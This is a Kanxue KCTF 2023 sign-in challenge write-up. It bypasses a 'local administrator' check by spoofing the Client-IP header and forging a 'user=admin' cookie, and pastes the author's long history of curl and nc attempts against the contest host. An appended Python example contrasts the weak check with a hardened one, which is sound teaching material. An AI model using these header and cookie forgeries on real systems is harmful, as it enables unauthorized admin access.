[Original] Kanxue 2023 KCTF Annual Contest, sign-in challenge: 生死较量 (Life-and-Death Contest)
Posted: 2023-9-1 13:42
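The page gives two key hints: "local" and "administrator".
"Local": bypass it with the HTTP header 'Client-IP: 127.0.0.1'.
"Administrator": the server response contains 'Set-Cookie: user=guest', so send 'Cookie: user=admin' from our side.
Final answer: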
curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
The write-up above is for people who know web.
.
Attached: the hour-and-a-half struggle of someone who does not know web (from .bash_history)
(Honestly the hardest sign-in challenge I have ever done)
.
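The journey:
The cookie was easy to spot; F12 shows it
(Then stuck for several minutes; by this point the first three bloods had all been taken)
Noticed "local"; with my extremely limited web-challenge experience I thought of X-Forwarded-For, tried it, no effect
(Stuck for another ten-plus minutes)
Looked it up and found there are many HTTP headers for bypassing a local check, so tried them one by one
(On reaching Client-IP the response finally changed, but why did it still say I was not admin?)
Despair
(Went off track: saw that php/5.5.9 was a very old version and started frantically trying "PHP Development Server <= 7.4.21 - Remote Source Disclosure")
404: it turned out the hour was up and the target machine had shut down automatically. Restarted and continued (obviously, the host in all the later commands changed)
(Saw that the response said apache and knew this was useless)
……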
.
Look at the last two commands below: the '-H' in front of 'Cookie: ...' was missing, which is why it kept saying I was not admin
.
..
...
The end. So heartbreaking.
curl ' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>; user=admin' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl -vvv '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=root' '
curl -vvv -H 'Cookie: user=administrator' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: localhost' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl ' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl ' -H 'X-Forwarded-For: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1,localhost' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For-Original: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-Host: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Remote-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-True-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'X-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Gateway-Host: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Client-IP: 127.0.0.1' -H 'X-Real-IP: 127.0.0.1' -H 'X-Forwarded-For: 127.0.0.1' -H 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=root' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user="' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv '
curl -vvv http://433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;password=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl --path-as-is -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=Administrator' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=localadmin' '
curl -vvv -H 'Client-IP: 127.0.0.1' '
curl ' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl ' -H 'Client-IP: 127.0.0.1' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H 'Accept-Language: zh-CN,zh;q=0.9,sq;q=0.8' -H 'Cache-Control: max-age=0' -H 'Connection: keep-alive' -H 'Cookie: <redundant>' -H 'Referer: -H 'Upgrade-Insecure-Requests: 1' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36' --compressed --insecure
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'X-Forwarded-For: 127.0.0.1' -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -d 'user=admin&pass=test123' -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: 433bb7e5-d7d7-4f99-9c4c-2051a962d4af.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' '
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
echo -ne 'GET / HTTP/1.1\r\nHost: /f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\n'
echo -ne 'GET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n'
echo -ne 'GET /getinfo.php HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n\r\nGET / HTTP/1.1\r\nHost: f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81\r\nClient-IP: 127.0.0.1\r\n\r\n' | nc f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com 81
curl -vvv -H 'Client-IP: 127.0.0.1' 'Cookie: user=admin;pass=test123' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
curl -vvv -H 'Client-IP: 127.0.0.1' -H 'Cookie: user=admin' 'http://f46ea093-0509-428a-abb2-5fc891c5f094.node.kanxue.com:81/'
Last edited by mb_mgodlfyn on 2023-9-1 13:49
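Added example, not part of the original post and not the challenge's source code: a Python model of the kind of server-side check that the two bypasses in this write-up imply, next to a hardened version that ignores client-supplied origin headers and requires an HMAC-signed session cookie. All function names, the key, the proxy address, the `session` cookie name and the sample IPs are assumptions constructed for illustration.

```python
import hashlib
import hmac
import ipaddress

SECRET = b"constructed-demo-key"   # constructed; a real key comes from a secret store
TRUSTED_PROXIES = {"10.0.0.5"}     # constructed address of our own reverse proxy

def weak_is_local_admin(headers, cookies, peer_ip):
    """Assumed server logic: origin and role both come from client-controlled input."""
    ip = headers.get("Client-IP") or peer_ip
    return ip == "127.0.0.1" and cookies.get("user") == "admin"

def sign_session(user):
    """Issue a cookie value the client cannot alter without knowing SECRET."""
    mac = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    return f"{user}.{mac}"

def verified_user(cookie_value):
    """Return the user name only if the HMAC tag matches; otherwise None."""
    user, _, mac = (cookie_value or "").rpartition(".")
    expected = hmac.new(SECRET, user.encode(), hashlib.sha256).hexdigest()
    ok = user and hmac.compare_digest(mac.encode(), expected.encode())
    return user if ok else None

def client_ip(headers, peer_ip):
    """Use the TCP peer; read X-Forwarded-For only when that peer is our proxy.
    Assumes the proxy appends the address it saw to X-Forwarded-For."""
    if peer_ip in TRUSTED_PROXIES:
        hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",")]
        for hop in reversed(hops):          # rightmost entries were added by proxies
            if hop and hop not in TRUSTED_PROXIES:
                return hop
    return peer_ip

def hardened_is_local_admin(headers, cookies, peer_ip):
    try:
        local = ipaddress.ip_address(client_ip(headers, peer_ip)).is_loopback
    except ValueError:                      # malformed address in a header
        return False
    return local and verified_user(cookies.get("session")) == "admin"

# Constructed request matching the write-up's final curl command.
spoofed = ({"Client-IP": "127.0.0.1"}, {"user": "admin"}, "203.0.113.7")
if __name__ == "__main__":
    print("weak check:    ", weak_is_local_admin(*spoofed))      # True
    print("hardened check:", hardened_is_local_admin(*spoofed))  # False
```
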